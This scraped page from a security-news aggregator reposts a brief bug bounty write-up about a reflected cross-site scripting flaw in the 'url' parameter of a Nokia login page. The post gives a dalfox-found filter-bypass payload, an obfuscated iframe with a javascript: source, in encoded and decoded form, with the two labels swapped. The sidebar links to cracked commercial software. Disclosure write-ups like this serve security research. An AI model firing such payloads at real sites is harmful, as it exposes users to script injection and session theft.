LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

How do I get cross site scripting(“xss”) in “Nokia”

1 year ago 68
BOOK THIS SPACE FOR AD
ARTICLE AD

This is my first and last Bug Bounty Writeup this year. 😀

I am sharing with you my latest XSS finding.

I’ve checked that XSS and confirmed that it was fixed properly.The specific endpoint had url a param that was vulnerable to Reflected XSS injection.---------.nokia.com/login/login.jsp?url=test

I’ve started to search for a bypass and used the Search function in Chrome Developer tools to search this endpoint /login in all JS files to check for another vulnerable param, but found another endpoint:

using tool dalfox and help me to bypass than done

---------.nokia.com/login/login.jsp?url="%26%23x27%3B><iFrAme%2Fsrc%3DjaVascRipt%3Aconfirm("hackedbyshari7a0x")><%2FiFramE>

payload

decoded = “%26%23x27%3B><iFrAme%2Fsrc%3DjaVascRipt%3Aconfirm(“hackedbyshari7a0x”)><%2FiFramE>

coded = “”&#x27;><iFrAme/src=jaVascRipt:confirm(“hackedbyshari7a0x”) ></iFrAme>

thanks for reading .

Read Entire Article
  3. How do I get cross site scripting(“xss”) in “Nokia”

Related

Flamingo Finance Bug Bounty Program

Flamingo Finance Bug Bounty Program

VAPT: The Secret Weapon for Security Superheroes

VAPT: The Secret Weapon for Security Superheroes

How We Hacked Voice Communication Solutions Company And Found BAC + Info Disclosure + IDOR :D

How We Hacked Voice Communication Solutions Company And Found BAC + Info Disclosure + IDOR :D

Bug Bounty Challenge (final): Day 8–28/04/2024

Bug Bounty Challenge (final): Day 8–28/04/2024

Mi camino en el Bug Bounty comienza, pero antes..

Mi camino en el Bug Bounty comienza, pero antes..

24.2 Lab: HTTP request smuggling, confirming a TE.CL

24.2 Lab: HTTP request smuggling, confirming a TE.CL

Trending

1. ISL
2. CSK बनाम SRH
3. Nottm Forest vs Man City
4. Daryl Mitchell
5. PM Modi
6. Tottenham vs Arsenal
7. Arvinder Singh Lovely
8. GT बनाम RCB
9. Prajwal Revanna
10. India Women vs Bangladesh Women

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved